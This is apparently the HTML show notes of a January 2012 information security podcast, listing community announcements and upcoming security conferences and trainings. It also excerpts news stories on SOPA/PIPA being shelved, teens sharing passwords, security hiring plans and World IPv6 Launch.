<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://arstechnica.com/tech-policy/news/2012/01/internet-wins-sopa-and-pipa-both-shelved.ars"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/01/internet-wins-sopa-and-pipa-both-shelved.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just hours after Senator Harry Reid (D-NV) announced he was delaying a vote on the PROTECT IP Act, Rep. Lamar Smith (R-TX), the sponsor of the Stop Online Piracy Act, followed suit and announced he would be delaying consideration of the companion legislation.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I have heard from the critics and I take seriously their concerns regarding proposed legislation to address the problem of online piracy,&quot; Smith said. &quot;It is clear that we need to revisit the approach on how best to address the problem of foreign thieves that steal and sell American inventions and products.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Committee will continue work with both copyright owners and Internet companies to develop proposals that combat online piracy and protect America&rsquo;s intellectual property,&quot; Smith continued. &quot;We welcome input from all organizations and individuals who have an honest difference of opinion about how best to address this widespread problem.&quot; (He may want to check out our thoughts on the matter.)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even former Senator Chris Dodd, the head of the Motion Picture Association of America, seemed to concede defeat. &quot;With today&rsquo;s announcement, we hope the dynamics of the conversation can change and become a sincere discussion about how best to protect the millions of American jobs affected by the theft of American intellectual property,&quot; he said in a statement. &quot;It is incumbent that they now sincerely work with all of us to achieve a meaningful solution to this critically important goal.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.nytimes.com/2012/01/18/us/teenagers-sharing-passwords-as-show-of-affection.html?_r=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nytimes.com/2012/01/18/us/teenagers-sharing-passwords-as-show-of-affection.html?_r=1</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Young couples have long signaled their devotion to each other by various means &mdash; the gift of a letterman jacket, or an exchange of class rings or ID bracelets. Best friends share locker combinations. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The digital era has given rise to a more intimate custom. It has become fashionable for young people to express their affection for each other by sharing their passwords to e-mail, Facebook and other accounts. Boyfriends and girlfriends sometimes even create identical passwords, and let each other read their private e-mails and texts.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They say they know such digital entanglements are risky, because a souring relationship can lead to people using online secrets against each other. But that, they say, is part of what makes the symbolism of the shared password so powerful.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.networkworld.com/community/node/79602"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/community/node/79602</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Like other analyst firms, ESG conducts research on IT Spending Intentions annually. One of the things we track is IT hiring plans in all areas including IT security.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2011:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 35% of all mid-market and enterprise organizations planned on hiring security staff</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 22% believed they had a &ldquo;problematic shortage&rdquo; of security skills at their organizations</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The situation has not improved at all over the past year. In 2012:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 39% of mid-market and enterprise organizations plan on hiring security staff</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 23% believe they have a &ldquo;problematic shortage&rdquo; of security skills in their organization</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/business/news/2012/01/world-ipv6-launch-this-time-its-for-real.ars"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/business/news/2012/01/world-ipv6-launch-this-time-its-for-real.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As happened during last year&#39;s World IPv6 Day, the Internet Society is taking the lead in organizing World IPv6 Launch on June 6, 2012. (Yes, right on the heels of the Venus transit across the disk of the sun.) But unlike last year, after turning on the new version of the Internet Protocol on some of the largest Web properties&mdash;and many smaller ones&mdash;this year, IPv6 will </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">not</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> be turned off again 24 hours later. So &quot;this time it&#39;s for real,&quot; and the new protocol will be here to stay at Google, Yahoo, Bing, Facebook, and Cisco, as well as many Akamai and Limelight customers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Also new this year is that several Internet service providers will be participating by enabling IPv6 for at least one percent of their customers&mdash;with more to follow. These ISPs include not only those that have already put a toe in the IPv6 waters before, such as Comcast, Free Telecom in France, and XS4ALL in the Netherlands; but also Time Warner Cable and AT&amp;T. Last but not least, Cisco/Linksys and D-Link will be enabling IPv6 support in the default configurations of their home routers.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
